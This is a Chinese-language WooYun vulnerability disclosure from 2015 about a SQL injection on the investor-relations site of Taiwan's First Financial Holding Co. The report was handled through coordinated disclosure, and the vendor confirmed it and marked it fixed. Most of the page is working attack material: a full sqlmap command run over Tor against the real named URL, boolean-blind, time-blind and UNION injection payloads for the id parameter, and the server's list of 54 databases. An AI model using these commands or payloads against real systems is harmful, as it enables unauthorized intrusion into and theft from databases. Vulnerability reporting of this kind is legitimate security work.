当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114732

漏洞标题:台湾第一金融控股公司SQL注入漏洞可影响54个库

相关厂商:台湾第一金融控股公司

漏洞作者: 路人甲

提交时间:2015-05-18 10:23

修复时间:2015-06-12 15:44

公开时间:2015-06-12 15:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-12: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

台湾 第一金融控股公司 SQL注入, 54个库

详细说明:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=15 --threads 2 -u "http://ir.firstholding.com.tw/c/event_release_o.php?id=4606" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=4606' AND 3933=3933 AND 'YHSr'='YHSr
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=4606' AND (SELECT * FROM (SELECT(SLEEP(15)))eiTK) AND 'DLrg'='DLrg
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: id=4606' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627071,0x56484c4c59706a6d4854,0x71766b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---


漏洞证明:

web server operating system: Linux CentOS 6.5
web application technology: PHP 5.4.40, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
available databases [54]:
[*] `new-ray`
[*] aastocks_db
[*] bboard
[*] bboard2
[*] bboard2_20101231
[*] chinastarch1
[*] cks
[*] cks_new
[*] community
[*] community_20101231
[*] doubleindex
[*] ginsengnatural
[*] glkg
[*] hds
[*] hds_2009
[*] information_schema
[*] jiuhao
[*] kotocms003
[*] kotoportal003
[*] l_xingyecopper
[*] maryhelp
[*] maryhelp_20140709
[*] mh
[*] midea
[*] mysql
[*] mysql_old
[*] netw@rld
[*] newworld_20131210
[*] newworld_demo
[*] ntop
[*] onlinereport
[*] performance_schema
[*] report
[*] samkadm_cms
[*] smart_xtep
[*] smart_xtep_20100106
[*] snowkiss
[*] tdn
[*] test
[*] tomocms
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_export
[*] tomocms2_my
[*] tomocms2_restore
[*] tomocms2_sg
[*] tomocms2_temp
[*] tomocms2_tw
[*] tomocms2copy
[*] view_db
[*] web2project
[*] wordpress
[*] xinhuapinmei

修复方案:

WAF或者过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-05-22 22:39

厂商回复:

感謝通報

最新状态:

2015-06-12:已修復